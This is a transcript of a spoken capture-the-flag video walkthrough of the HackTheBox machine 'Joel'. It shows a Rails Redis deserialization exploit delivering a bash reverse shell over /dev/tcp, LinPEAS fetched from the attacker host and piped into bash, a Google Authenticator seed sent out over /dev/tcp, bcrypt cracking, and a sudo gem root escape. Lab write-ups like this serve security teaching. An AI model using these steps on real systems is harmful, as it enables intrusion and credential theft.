What's going on YouTube? This is Ipzak. I'm doing Joel from HackTheBox, which was a super fun box that did something I didn't even know you could do in the Privesk, and that is put two-factor authentication around your sudo command. It was super cool to see and fun. Well, maybe fun's the wrong word because it dealt with time zones, and anything with time zones is just pain. And in this one, especially because if you had the time zone wrong, just weird things would happen and you wouldn't realize it's related to the time zone, at least if you're me. But before you get to that Privesk, you have to do the initial foothold. You see two web services on the box, one hosting source code to a Ruby on Rails application, and the second one is the Ruby on Rails application itself, which is just a blog. The blog isn't exactly vulnerable because of the web code. It's vulnerable because of the Rails framework being a out-of-date version. So with all that being said, let's just jump in and do this box. As always, I'm going to start off with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Joel, and then the IP address, which is 10.10.10.211. This can take some time to run, so I've already ran it, but before we look at the results, I do want to highlight the importance of that sudo command, because if you just did nmap 10.10.10.211, it's going to tell you the host is offline. And that's because this box isn't listening on any of the default host discovery ports, which is 80 and 443. And since it's not listening on those, nmap thinks it's offline. The third way it detects if a host is online, or actually the very first way, is sending a ping request or ICMP. But without root privileges, nmap can't send that request. So if I do a sudo nmap, we'll see the results. And if we want to look into the host discovery process, we can do -d for debug and --packet trace, and then the IP address, which is 10.10.10.211. So we can see it initiates a ping request, and then it sends two port requests, 80 and 443. One of these is SYN and one's a SYN-ACK, but how it does it isn't too important. Just knowing it does a ping scan in 80 and 443 is good. If you want a more in-depth thing, I'm sure if you go to ipsec.rocks, I've explained it in the past. But since this box is listening on 22, 8000, and 8080, none of these host discovery ports are listening, so the box thinks it's offline. Even if we specify the exact ports we want, because host discovery fails, it doesn't actually scan those ports. So that's why the root privilege is important. And that it needs root privilege because it interacts with raw sockets in order to do that ping, and low privilege users can't do that. If we look at the ping binary, we'll probably see this as set UID. So if we do LSLA, it's not. Maybe it's a capability. So get cap for get capability. And we can see it has the capability net raw, which allows it to interact with raw sockets. And this is just a granular permission. So you don't have to give it full root privilege to do something. You can give it the permission it wants, which is this thing. So nmap does not have that. If we do get cap, which nmap, that did not work. Where is nmap installed? Git cap user bin nmap. It has no capabilities, and it's not a set UID, so that's why it can't do that. If you do it with sudo, you can see it has those ports open. So with all that being said, let's dig into the nmap result and see it has 3 ports open. The first one is SSH on port 22, and it's running Debian. The next one is HTTP on port 8000. It's running Apache, and the title says GitWeb, which I guess is the application. And the application being Git makes me very interested. Then we also have a second HTTP server on port 8080 running Nginx, and it's saying it's the Phusion Passenger. So I want to know what this is, because this is the only thing in this nmap scan I don't know. So let's Google Phusion Passenger. And it's just a web app server that integrates with Apache Nginx, and it supports Ruby, Python, and Node.js. So it supports multiple languages, and yeah. It is version 606. We can do a search exploit on Phusion, see if there's anything. 1.0, I don't even know if that's the same thing, but let's see. Next thing we can do is maybe Google this and look for release notes. So release notes. Let's see, maybe if this has a date. Come on, where's the date? And July 14th, 2020. Actually, my birthday. But because this box is retiring and boxes generally last like 4 to 6 months, I'm going to say this is a pretty recent version of Passenger, so I'm not going to go down the whole exploit path for this application. Instead, let's just take a look at what was on port 8000 and 8080. So going to a new tab, and then browsing to 10.10.10 to 11 port 8000. I'm going to copy this so we can go to 8080 really quick to see the difference between these two websites. This first one has a .git directory, so I definitely want that. And this one looks like a blog. Looking at this, the title of this or the description of that Git is blog. So before looking at this application or poking at it manually, I'm assuming this is the source code to it. So having the source code is always great. So I'm going to try going to like .git to see if we can go there. Doesn't look like we can. So now the challenge is finding out how to download this. If I click on snapshot, it looks like we can download. So it is now currently saving to my disk. I'm going to make the directory blog and see if it's downloaded. It looks like it has. So move downloads git to my directory and then tar zxvf to decompress it. And it created this directory .git. So let's go into it. And we see config.ru. So we know this is going to be a Ruby application. There is a gem file which goes into everything that is required. It's kind of like the requirements.txt of Python, just telling you how to install this app. One of the things I like doing with Ruby applications is using a tool called Brakeman. So if we search what Brakeman is, it is a static security analyzer for Ruby. So brakemanscanner.org. So I always like using static code analyzers when I can because you may get a really quick win. And there is a free version of this. I forget how to get to install. I think maybe under documentations, installation. And before doing anything with gem or anything at all with Ruby, I'd highly recommend taking a snapshot of your VM just because sometimes Metasploit doesn't like it when you muck with the Ruby environment. So let's now install this. And it looks like we probably need root to do this. So gem install Brakeman. And then it just says once we install it, going to running, you just run Brakeman inside of your application. So I'm going to run Brakeman now that I have that gem installed, and it's going to load the scanner and says there's only one finding, which is a cross-site forgery. I'm going to do Brakeman-H and see if there's a way we can be more verbose. I'm going to say -A run all checks is a pretty cool option. So we're going to do -A and see what it says. We have 7 security warnings. So missing encryption. So force SSL is not enabled. That's not something I really care about. CSRF token, weak hash, and unscoped find. So if there is some type of user interaction, maybe we can do some type of CSRF, but nothing here is sticking out as a big exploit. And this is one of the tougher parts of this box is finding out the exploit, because this application is not telling us there's a vulnerability, and the vulnerability is pretty well hidden. It is running Rails version 5.2.2.1, and if we Google like Rails 5221 changelog and see if we can find a date, I think if we go to Ruby Gems versions, I think this is one that will have a date. We can see where things are released. And remember that the Phusion Passenger, that was like July 14th, 2020. And this is March 13th, 2019. So there's probably a reason in HackTheBox world why someone used a super out-of-date library. Like if this one was, let's see, if we were running 6032 or even 5243, because these are around the time the box released, I probably wouldn't go down and look at all the exploit paths for this. But because this version is particularly old, I'm going to look into exploits for Rails 5221. So let's just Google Rails CVE, and we'll look at the search results on MITRE. And denial of service, I don't care. CSRF, I don't really care about those. We do have a deserialization attack below 5243. Our version was 5221. So these are going to be interesting. We have 2 deserializations and a code injection vulnerability. So looking at these, doesn't really give us too much detail. Allow attack and control the local. Again, attacker to supply information can be inadvertently leaked from strong parameters. Nothing too interesting about these. The deserialization vulnerability, or it is interesting because it's deserialization, but no details on how to exploit it. There's a typo in this, vulnerability. But if we Google this, if we Google for like POC, or maybe do search exploit for Rails, I don't see anything. File content, that's 521. That could be vulnerable. No, 5221 is what we have. So nothing too interesting there. But if I Google this CVE, we go to GitHub, and we can find a POC, or a proof of concept. So I don't know exactly what this is, but at the bottom there is a Google form link. So we go here, and it's saying, let's see, a potentially unintended unmarshalling of user-provided inputs in Memcached and Redis cached. Let's see, there's something that says if they use raw true. So let's look at our code. So I'm going to do grep-r raw : true. I'm going to do I to make it case insensitive, and then period. And we can see there are 2 items that is using cache.fetch, which it's saying to do here, and raw true. So before we dig into this, I'm kind of curious what this raw true is. So I'm going to Google cache.fetch and Rails to see if we can find some documentation of what this is. So I'm going to search for raw. And you can specify raw to send a value directly to the server with no serialization. And it's talking about Redis, which is a like caching thing. I'm sure we've done a box in the past where we exploited Redis, because the exploit here is saying if we use raw, we can send it to the server, and the application itself won't serialize it. We're just sending it a raw string. So I'm assuming we send it a raw string that's a serialized object, and then when later the application gets that raw string, it does some type confusion. It goes, oh, this is a serialized object, let me unserialize it, not realizing this was a serialized object that the user wrote. And when a user writes a serialized object and gets a server to unserialize it, bad things can happen. So that is the exploit path in this box, it seems. So the step is to find out where this raw true is. So let's look in this controllers.rb file. And I'm going to use Vim actually, so we have syntax highlighting. Raw true. So this is under current username. And let's go to the next file. This user's controller. Raw true. Whoops, I need a space. There we go. And this is under update. So it looks like we can update our user and send a value directly into the cache database as a string, which we can put as a serialized object. I bet if we look at this create option, the create doesn't have raw true. So this exploit is only possible when we're updating a username. So knowing all this, let us go back to the CVE page and look at how we do this. So this is creating the serialized object. We're doing bundle exec Rails console, and that's putting us in this interactive Ruby prompt. And we create the cached object to put in, and then print to the screen as a URL encoded payload, and that's going to be this. So we have to go to the blog app and create a user. So I'm going to do sign up. Username is going to be ipsec, root at ipsec.rocks, and password of password. So we created the user. Let's now log in. So root at ipsec.rocks, password of password. And then we can go to our profile and we can edit our name. So this is where we have to put the serialized object. So let's go see how we create this. We need bundle exec Rails console. So let's get out of this. And I'm going to go up to this bundle exec Rails console. And this isn't working. So we need to create a Rails project for this. And if I do Rails, I actually don't have it installed. So we have to do apt update to update apt, or a sudo apt update. And then once it updates, we can do a sudo apt install Rails. And there were some error messages, but it looks like it may be fine. Let's see. There's a lot of gets it's doing. So let's wait for this to complete. And my apt command is not happy with me. So if I do this apt update again, I can see we have this following signature cannot be verified because public key is not available. If I do a apt key list to list all my keys, I'm actually going to pipe this over to less. I'm going to search for expired, and I can see this key is expired. So what I'm going to do is this apt update command again, and we will do a sudo apt key advanced key server keys.gnupg.net, and then we need to receive the keys for this. And this should tell us it is updated a key, or maybe imported a key. I don't know exactly the message, but after this runs, we will see. There we go, imported one key. So now my apt update command does complete successfully. So I can now do a apt install Rails, and I have to again emphasize how important this is to install, to put a snapshot in before doing a command like this, because bad things can happen when you install Rails with Metasploit and other Ruby projects. This is going to take a while, so I'm going to just use the magic of video editing and skip to when this command finishes. So our apt install Rails command has finished. So we can create a new Rails project with Rails new, and then the project name. So we'll just do exploit. And then when we go into exploit, we can just do Rails console. So cd exploit, or I think we could do this bundle exec command. Where is it? Bundle exec Rails console. Let's see if it works. If it doesn't, then we can just do, yeah. So this works, or we can just do Rails console. You don't need to do that bundle thing. Same exact thing. And we can go back to the payload and edit this. So the only thing we actually have to edit is this code piece. I wonder if there's a place where I can just copy the whole payload instead of going line by line. Does that Google form have it? Nope. So I think I'm going to have to copy that line by line, which is going to be annoying. But let's just go to here. So code, and then we put it in single brackets and these tilde or whatever that's called, the code execution brackets. And we have to put a payload. So instead of a touch, I'm going to do bin bash -c, then bash -i, pipe to that dev TCP 10.10.14.4 port 9001 0 at and 1 and double quote. And the reason why I always do this bash-c first is because this is a like bash-ism. If I'm not in a bash shell, this redirection thing won't work. So this ensures I'm executing in bash. So when I do this redirection, this works. So you may not need this, but if you don't have this, it may fail silently and you won't know. And I've never seen putting this actually break the payload. So one of the things I always do out of habit. So we have that. So let's now copy each piece. So that, I forgot the E, so type that. Okay. It was in red font, so I was like, wait, error message? But no, it's just telling me what that variable was. So do that. And then we can, whoops, copy that. Okay. And then we need puts payload, require URI. So this payload, I think that just made our serialized object maybe. This required is like an import statement loading URI. And now we can do, wait. I don't know what the puts payload did, honestly. Actually, I think all that does in Ruby puts is print. So it just printed payload. So then when we do this, no. We screwed something up. Let's see. This is the Rails app. Puts undefined local payload. So it errored with this, I think. So let's look at this command again. And the other error we got was like payload not found, I think. Where is it? Puts URI undefined local variable payload. I'm assuming this needs an equals. If we do payload now, there we go. That looks better. When I tried printing that out before, I just assumed it couldn't print the serialized object. So now that we have that, we can copy this command. No, we need this. Wrong piece of clipboard. There we go. So now we have a serialized object. So this is just this, but in URL encoding. We could probably copy this and just have Burp Suite do URL encoding for us. We don't actually need Ruby to do this piece, but oh well. I'm going to copy this, make sure I don't get that one line break. So now we can finally go back to our blog and our edit field. I'm going to refresh this page in case there's anything time sensitive. And let's just go to Burp Suite, go to a proxy tab, intercept is on, update user, and I'm going to change where the username is. I'm going to paste this giant payload, which is that serialized object. Click forward, and I must be logged in to perform this action. So something was time sensitive and it logged me out. So let's go root at ipsec.rocks, password of password, and go back to profile, intercept on, update user, change, forward, turn intercept off. Something went wrong. If we nc lvnp 9001, refresh the page. See, profile updated successfully. When we view a profile page, nothing happened. I'm going to try this again. So let's copy this. Profile. Username. Let's make sure we're editing this. Update user. Paste our payload. There we go. I'm going to make sure it's not putting a line break at the beginning. So I'm going to do backspace, and it deleted that equals. So let's go back and do that. Forward. Something went wrong. I'm just going to hit enter. And we got a shell. So what actually happened here? Let's see. Can I easily show this? Yeah, we should show this. This video hasn't taken too long. So this is potentially a common mistake, since I just made it unintentionally, and it took me a second to realize what happened. Let me log out, and we'll create a new account. Please subscribe. Password is please at ipsec.rocks, or let's do checkout ipsec.rocks. Password to password. So log in. Checkout ipsec.rocks. Password. Oh, come on. Okay. I was like, did I type it on that one field? So I'm going to create a new session, nclvnp 9001. We're going to make sure we have this in our clipboard. And turn burp suite on. Make sure intercept is on. And I'm going to put my username as the payload. I'm going to click forward. And we had something went wrong here. So what I had done is I hit Control-Shift-R to refresh the page, because that's my habit when I refresh pages. But that's going to send the payload my browser thinks I sent. Because Burp Suite intercepted the payload, my browser still thinks it sent the payload of IPSec. So I'm going to hit Control-Shift-R, and this screen pops up. Must send information or repeat any action. I'm going to click, let's see, intercept is still on. I'm going to click resend. Let's see, this is not the detect portal, but it resent this and sent the username. And it reset the user, eliminating that field. So that is why when I went here, it still said my user was please subscribe, and the payload did not fire. But if we go back, let's not intercept this one. Let's intercept this request. Click forward. So we now have poisoned the Redis cache. And upon viewing this page, that's where that second thing gets triggered. So I'm not going to do Control-Shift-R. I'm just going to do Enter. And that's where we see we now have that shell. So that is the exploit. And if you're having trouble, make sure you don't accidentally reset the user back to the previous thing, not the payload, by doing Control-Shift-R. But now that we have this, I'm going to do Python. Let's do which Python to make sure we have Python. We do. So python-c import pty, pty.spawn, bin bash. And I'm going to make dir dub. I'm going to copy opt privilege escalation script awesome suite, LinPEAS, and then linpeas.sh to this directory. And I'm going to run python3-m HTTP server. Do we have curl? We do. So I'm going to do curl 10.10.14.4 port 8000 linpeas.sh. Pipe it over to bash to execute it. I don't have curl. Didn't give me an error message, so I thought I did. Let's just do cd dev shm wget on this page. I know there's a way to do wget to standard out. Let me just Google this. Wget to std out, because in all the videos I default when curl's not there to writing it to disk. I think it's like wget-o standard out. I think it's -o dash. Yeah. -o, capital O dash. I have to do Control Z, stty, raw minus echo. Hit FG, enter. Now I have my up key. So I'm going to wget-o dash I'm also going to add -q, which I think is quiet. And then we pipe this over to bash. And now we have wget running the script without doing any disk writing. So let's this script run. And after it finishes, we'll come back and see if we can find anything. Now that LinPEAS is done, and the very last thing it did was search for specific hashes inside of files, and it decided to look in these files on its own and gave me 2 password hashes, which I love. So let's take a look at exactly what these hashes are. So I'm going to do less on this SQL file, and I'm just going to search it for 2a. So /2a, and we see actually 2 hashes. Let's see, SZ and QQ. So going back up, it looks like the QQ one isn't shown. So we should look at both these hashes for stuff. I'm just going to put this in a new pane. We don't need the web server anymore. Put that there. So let's grep 2a on var backups dump. And we have a password for Jennifer and Bill here. Oddly enough, I don't know why I didn't grab both of these and it only grabbed one. That's weird, but let's run that command again. Awk print, let's see, 1, 2, so we want 2. Colon, 3, 4, 5, 6. $6. See, it did a date. 8. There we go. So we got 2 hashes here in a better format. And let's do the same thing, but a home bill blog bd.sql. So home bill blog bd.sql. Let's see. Let me clear the screen a little bit. Looks like we have 2 hashes, and these are different hashes. So let's copy these. Okay. I'm going to copy these now to my Kraken server, and let's try cracking it. So SSH to the Kraken, cd hashcat, v hashes joule, paste these, and I believe this is bcrypt. I'm going to do /hashcat -- example hashes and search for bcrypt 2A05 or 2 star is what it says. So I'm assuming this is bcrypt, which is mode 3200. So /hashcat -m 3200 hashes joule opt word list rocku.txt. And I think that's all I need. Oh, we're going to need to add that -- username flag. -- username. I think it's username, maybe usernames. I never remember if it's plural or not. But 1 token length exception for Bill. And I think that is my fault. So before we begin, I'm going to fix the hashes. So line 2 had a error. It was up here. Line 2 was in the backups directory, or XW. So I accidentally deleted a character. I thought I added a character before, but I accidentally deleted it. There we go. So now let's rerun hashcat and make sure we don't get any line length exceptions. So far it is looking good. 3, 4. There we go. We can look at how long this is going to take. It says 22 hours, but it already got 1, which is SpongeBob. So I'm going to quit this, and we can just do -- show. I think we need username again. And we can see Bill had a password of SpongeBob. So I'm going to just run this so we have it running in the background. And, oh, we are the Bill user. So if we do sudo-l, password of SpongeBob, we get this verification code after we type that. So I'm going to Google sudo verification code. And we see it's some type of two-factor login for sudo. So that is unique. If we go into our home directory, there is a Google Authenticator file. And I'm actually going to search my history recursively. And files inside. So LinPEAS did show us this Google Authenticator thing. So if we cat this, it looks like we potentially have a seed. And I honestly don't know if this is required to work. Generally, when you do two-factor authentication, you wouldn't have this here. But because this Google Authenticator file does exist, I'm going to assume we can exploit this. So let's copy this to our box. So I'm going to do netcat lvnp 9001, direct it to the file Google auth. And we can cat Google Authenticator to dev TCP 10.10.14.4 port 9001. And we sent the file. I'm going to MD5 sum it on both ends just to make sure it works. So MD5 sum Google auth. And that is the same. I'm going to send my hashcat to a different pane. I thought. 3. There we go. So now my hashcat is away, so that's not tainting the screen. I'm going to do apt search OAuth and see what we have. OAuth. There is a lot of Ruby. Node OAuth. Let's see. Sudo apt install OAuth. Is there a binary that just has OAuth? No, we're not that lucky. So let's see. Maybe if we try Googling Linux OAuth CLI for command line application, we see maybe add Google for Google OAuth. We have OAuth is a simple CLI for the Google API. If we go here, looks like there are some binaries. So I'm going to try to install this. So save file. Let's make dir OAuth, go into it, and then move. Is it just Linux or something? Downloads Linux AMD. I think that's it. tar-zxvf. OAuth 2L. chmod plus x. Let's move that to a directory. Curl fetch header. What is this? Fetch. So you could not get default credentials. That doesn't look like what we want. Does this give examples how to use it? Git clone, fetch credentials. Cloud platform. Let's see. Test token. I don't think this is it. Linux OAuth tool. Maybe this. OAuth tool in apt. Sudo apt install OAuth tool. It's weird. So how do we get OAuth tool? OAuth toolkit. downloads page, Debian, OathTool command line. So download AMD 64. Let's see if this, oh, I did open, my bad. Save file. Sudo dpackage-i downloads this. Let's see, there's a dependency. Let's see, sudo apt install lib oauth 0. Let's see, let's try this. Oh man, this is not a fun challenge to do live. It's not understood. What? Oh, forgot an L. Okay. Following new packages will be installed. OAuthTool. Let's see. Apt install this. Waiting for headers. Let's restart. There we go. So now let's run this dpackage command to install it. I'm not seeing any dependency issue, which is promising. Wait, OathTool? Was that my issue? Apt search OathTool. Yes. I was typing OAuth, thinking that was the package name, but it's just oath. So you can probably just do sudo apt install OathTool. You don't have to go through that whole dpackage thing. I'm guessing I installed a later version because it's saying downgraded, but now we have OathTool. It says to use dash to read from standard input or @ file to read from a file name. So I'm going to do or let's move Google Auth to this directory, and we can do OAuthTool @Google Auth to see what happens. Hex decoding of secret failed. I'm going to try -B, and we get a key. This -B is base 32 encoding of key instead of hex. And if we look at this, I believe this is the key, and this is definitely not hex. The default for base 32 is off. So yeah, base 32 is essentially base 64, but not case sensitive, I believe. So we do that, and we get a key. So let's try using this key with SSH. So let's do sudo-l, password was SpongeBob, and we're going to run this 059979, and we get an error message. Run this again. And that's not working. So maybe we did this wrong. I'm going to touch test, and we're just going to run -B test. Error reading key. Let's see. Let's go back to -H. See if there's any other options. Maybe we can try -TOTP. So -B, was it Google Auth? And then -TOTP. Nothing. Is it --? So we can try running it with this. Sudo-l. Paste, and still not working. So the next thing I'm going to try, well, at least now it changed. So before, without that TOTP, it's always the same. So at least now it's changing. Maybe it changed before we had a chance to type it in. 48426. I'm going to run date on both ends to make sure a date is the same. This is GMT. I am EST, so we have the dreaded time zone conversion. But date-s, let's do 21, oh, not 2119. I'm going to assume my hour's correct and maybe minutes not. So run date again, 16. I'm going to say 20, let's say 30. Sudo 26. This should be fine now. So now our date hopefully is correct as long as our hour is correct. So now I'm going to run this OAuthTool again. 747238, and I probably typoed that. Copy, paste, and we are still having issues. Oh, wait. SpongeBob. Verification code now. SpongeBob, and then put this. Error not permitted while writing config. SpongeBob. Let's try this again. Copy, paste. I don't know why it's giving me that error. I can't tell if that's an actual error of the application or a different error. SSH bill at 10:10:10 to 11. Yes. Okay, so we can only auth with SSH keys, it looks like. So I'm going to make dir home SSH. And let's do SSH keygen-f bill cat idrsa or cat bill.pub. And let's try adding this file here. So echo this to authorized keys, chmod 600 authorized keys, and we created that in the OAuth directory. chmod 600 bill sh-i bill at 10:10:10 to 11. So now we're logged in with the proper terminal. So just in case there was like something breaking because of my reverse shell with this, that's why I did this. So now I have a legitimate session. So we can copy this, paste, and we still get this operation not permitted while running config. So I'm going to try this Google Auth and let us copy this. I'm going to do OAuthTool, and we'll do it this way. OathTool. Maybe I don't need the dash for standard in. Okay, dash is for standard in, so I'd be typing that. But it looks like I can do it this way. So I'm going to copy this. And I just want to see if this is giving me different values. So we got this. So this is identical. So SpongeBob. I'm thinking something maybe broke with this box because I think sudo was updated for the sudo exploit, and that may have broke this box. I'm going to pause the video and check a few things. So I don't think the update broke it. What I actually think happened is my time is off. So I did date on both ends, And I looked and I'm like converting this to my head, like, oh, this is like 9:41 GMT. I'm 9:41 AM. Like, it's a time zone conversion thing. The hours is correct if this said PM. So let's do date-s. I wonder if I can just do PM. Nope. So 9:42:30 PM. Okay. Sudo. And I probably should change the date a bit more, but maybe it'll be within sync enough. So let's try. Because I changed the time, I think my SSH is going to die for a little bit. This will work though. Sudo-l SpongeBob. Verification code. Let's do copy and paste. So copy, paste. Operation not permitted. SpongeBob. I'm going to write SpongeBob 1 2 3 4 5 6. And I don't get that operation failed. That is such a weird behavior. Date 9:43. It's close. Time date CTL. Time date CTL. Let's see. Time zone. Can I just do Europe, London? Let's see. How do I set time zone? TZ? Config? That's not it. Let's try sudo time date CTL, set time zone, Europe, London, date. Awesome. Date. Okay, so sudo date-s, going to copy this, and we're going to say 21:45:10. There we go. So now our date should be in sync. Again, because I changed the date, my SSH prompt is hung for a little bit. I think it has to do like some type of key renegotiation or something. But it seems fixed. Date seems accurate. Sudo-l SpongeBob. Let's do this OAuth thing, or oath. It's not OAuth at all. I don't know why I keep saying OAuth, but OathTool, paste. Well, it didn't work, but that's more promising since we did not get that error message. Let's see. Okay, it's valid in my clipboard. So something is wrong still. This required a library. I suppose we can't just upload this tool here, which OathTool, we can try. CD, let's nc lvnp 10 or 9001 user bin OathTool dev shm nc 10.10.14.4 9001 OathTool chmod plus x. Let's see, locate lib oath.so, locate lib oath. Oh, I gotta update DB. Let this run, and then we can locate it. Copy this, nclvnp 9001 send this file. So this is liboath.so.0. See, file liboath so0. That did not work. I was hoping it would load from the current, like this directory. Wonder if we can export path is equal to :path. Will that work? No. Date on both ends, 9/48/20. This is correct. I'm just going to try SSHing again. Let's try this. Sudo-L, SpongeBob, verification code, 312263. Somehow I think we went backwards in progress. Oh. My date now says I'm a whole day ahead. That's annoying. Date-s, let's do 2/10/2021, 21/49, we'll say 15. There we go. Now my date is correct. So sudo-l SpongeBob 691731. There we go. So it was a time zone issue. I don't know why, like before, it was giving that weird error message. That is super weird behavior. But now we can do user bin gem. So let's do GTFO bin. Maybe if it detects like a previously valid TOTP, then it does that. I don't know. But it looks like we have a few ways we can do this. So sudo gem like this. So let's try this. bin sh. Sure. And we get root. Because we ran sudo before, I think that's why it didn't prompt us. So we can exit this again, run this sudo gem open, and it wants the password, so SpongeBob. And then wants a TOTP code, so let's copy and paste this. And yep, that works. So that is the box. Hope you guys enjoyed it. Take care, and I will see you all next week. Oh, wait, before we go, I did just want to show, if we do GitHub Brakeman, I did put a issue in for it not checking that CVE. So we'll see if it gets added, but yep, that's it. Take care, and I will see you all next week.